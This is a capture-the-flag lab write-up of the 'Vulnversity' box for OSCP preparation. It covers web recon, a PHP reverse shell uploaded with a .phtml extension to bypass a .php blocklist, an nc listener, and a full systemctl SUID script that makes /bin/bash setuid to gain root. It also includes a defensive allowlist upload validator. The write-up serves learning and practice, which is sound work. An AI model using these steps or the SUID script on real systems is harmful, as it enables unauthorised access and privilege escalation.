OSCP Prep: Vulnversity without metasploit

Allen
Feb 17, 2021
Learn about active recon, web app attacks and privilege escalation.

In the nmap scan I see several ports open, but 3333 sticks out the most for two reasons.

1. HTTP normally runs on port 80, not 3333.

2. The HTTP title is "Vuln University", which is the name of this box.

So I simply typed the IP address with the HTTP port and discovered a website: 10.10.120.237:3333

From here I was able to use dirsearch to discover hidden directories.

I discovered a hidden directory, /internal/, which appears to be an upload page.

From here I was able to download a PHP reverse shell and open it in a text editor.

Inside the file I changed the IP address to that of my VPN connection (the tun0/tap0 interface).

My VPN IP address is 10.6.34.136.

You can leave the port the same.

I attempted to upload the file, but the .php extension is blocked.

The .phtml extension is allowed on this server, so I changed the file's extension.

The file was successfully uploaded.
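The bypass above is what a blocklist on ".php" alone buys you. As an added defensive example (not code from the original post or the box), here is that style of blocklist in Python next to an allowlist check that decides on the last extension only, sniffs the leading bytes of binary types, and stores the file under a server-chosen name; the allowed-extension set and signature table are constructed for this example.

```python
import os
import secrets
from typing import Optional

# Extensions this (constructed) upload form is meant to accept.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

# Leading bytes of each allowed binary type, so the content is checked
# and not just the name (plain-text types are not sniffed here).
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}

def blocklist_allows(filename: str) -> bool:
    """The filter the box effectively used: reject only names ending in '.php'.
    Kept to show the failure mode; any other extension the server also
    executes (here .phtml) is waved through."""
    return not filename.lower().endswith(".php")

def allowlist_extension(filename: str) -> Optional[str]:
    """Return the extension only if it is allowlisted, else None.
    Decides on the last extension, case-folded, and refuses names without one."""
    base = os.path.basename(filename.replace("\\", "/"))
    if "." not in base:
        return None
    ext = base.rsplit(".", 1)[1].lower()
    return ext if ext in ALLOWED_EXTENSIONS else None

def content_matches_extension(data: bytes, ext: str) -> bool:
    """For binary types, require the file to start with that type's signature."""
    sigs = MAGIC.get(ext)
    if sigs is None:  # txt and other text types: nothing to sniff
        return ext in ALLOWED_EXTENSIONS
    return any(data.startswith(sig) for sig in sigs)

def stored_name(filename: str, data: bytes, token: Optional[str] = None) -> Optional[str]:
    """Name to store an accepted upload under: a server-chosen random token plus
    the allowlisted extension, so the client never picks the name or the handler.
    Returns None when the upload must be rejected."""
    ext = allowlist_extension(filename)
    if ext is None or not content_matches_extension(data, ext):
        return None
    return f"{token or secrets.token_hex(16)}.{ext}"
```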

From here I did another dirsearch and found an uploads page. Once we submit the reverse shell to the file upload page on /internal/, we navigate to /internal/uploads to get a shell (i.e., activate the reverse shell).

Here is the dirsearch finding for the reverse shell activation.

Once you create a listener for the port using nc -lnvp 1234, you can execute the payload by browsing to 10.10.120.237:3333/internal/uploads/php-reverse-shell.phtml. I now have a shell on the machine.

Here I found the user flag.

From here I hosted linpeas.sh on a server so I could download it onto the machine.

Here we discover a SUID vulnerability: systemctl has the SUID bit set.

I slightly modified the script that was provided.

# Write a one-shot unit whose ExecStart sets the SUID bit on /bin/bash
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF

# Link the unit into systemd and start it immediately via the SUID systemctl
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

From here I was able to copy and paste the whole script for the systemctl SUID and gain root.


Allen

eJPT | Sec+ | Cyber Security Enthusiast. I plan on obtaining the eCPPTv2 and OSCP in 2021. Just documenting my experience of becoming a pentester along the way.